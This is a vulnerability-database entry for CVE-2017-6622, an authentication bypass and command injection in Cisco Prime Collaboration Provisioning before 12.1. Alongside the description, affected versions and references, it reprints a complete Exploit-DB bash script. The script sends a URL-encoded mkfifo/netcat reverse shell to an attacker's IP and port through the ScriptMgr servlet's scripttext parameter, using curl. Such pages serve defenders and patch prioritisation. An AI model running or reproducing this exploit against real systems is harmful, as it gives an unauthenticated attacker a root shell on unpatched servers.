CVE-2017-6622
Description
A vulnerability in the web interface for Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to bypass authentication and perform command injection with root privileges. The vulnerability is due to missing security constraints in certain HTTP request methods, which could allow access to files via the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted application. This vulnerability affects Cisco Prime Collaboration Provisioning Software Releases prior to 12.1. Cisco Bug IDs: CSCvc98724.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution
# Exploit Title: Cisco Prime Collaboration Provisioning < 12.1 - ScriptMgr Servlet Authentication Bypass Remote Code Execution
# Date: 09/27/2017
# Exploit Author: Adam Brown
# Vendor Homepage: https://cisco.com
# Software Link: https://software.cisco.com/download/release.html?mdfid=286308336&softwareid=286289070&release=11.6&flowid=81443
# Version: < 12.1
# Tested on: Debian 8
# CVE : 2017-6622
# Reference: https://www.tenable.com/plugins/index.php?view=single&id=101531
# Mitigation - Upgrade your Cisco Prime Collaboration Provisioning server to 12.1 or later.
# Description - This vulnerability allows an unauthenticated attacker to execute arbitrary Java code on a system running Cisco Prime Collaboration Provisioning server < 12.1 via a scripttext parameter in the ScriptMgr page.
# Usage: ./prime-shell.sh <TARGET-IP> <ATTACKER-IP> <ATTACKER-PORT>
function encode() {
echo "$1" | perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"'
}
TARGET=$1
ATTACKER=$2
PORT=$3
BASH=$(encode "/bin/bash")
COMMAND=$(encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER $PORT >/tmp/f")
SCRIPTTEXT="Runtime.getRuntime().exec(new%20String[]{\"$BASH\",\"-c\",\"$COMMAND\"});"
curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT"
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| cisco | prime_collaboration_provisioning | 9.0.0 | |
| cisco | prime_collaboration_provisioning | 9.5.0 | |
| cisco | prime_collaboration_provisioning | 10.0.0 | |
| cisco | prime_collaboration_provisioning | 10.5.0 | |
| cisco | prime_collaboration_provisioning | 10.5.1 | |
| cisco | prime_collaboration_provisioning | 10.6.0 | |
| cisco | prime_collaboration_provisioning | 10.6.2 | |
| cisco | prime_collaboration_provisioning | 11.0.0 | |
| cisco | prime_collaboration_provisioning | 11.1.0 | |
| cisco | prime_collaboration_provisioning | 11.5.0 | |
References
- http://www.securityfocus.com/bid/98520
- http://www.securitytracker.com/id/1038507
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1
- https://www.exploit-db.com/exploits/42888/
- http://www.securityfocus.com/bid/98520
- http://www.securitytracker.com/id/1038507
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1
- https://www.exploit-db.com/exploits/42888/
CWEs
CWE-264 CWE-862
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.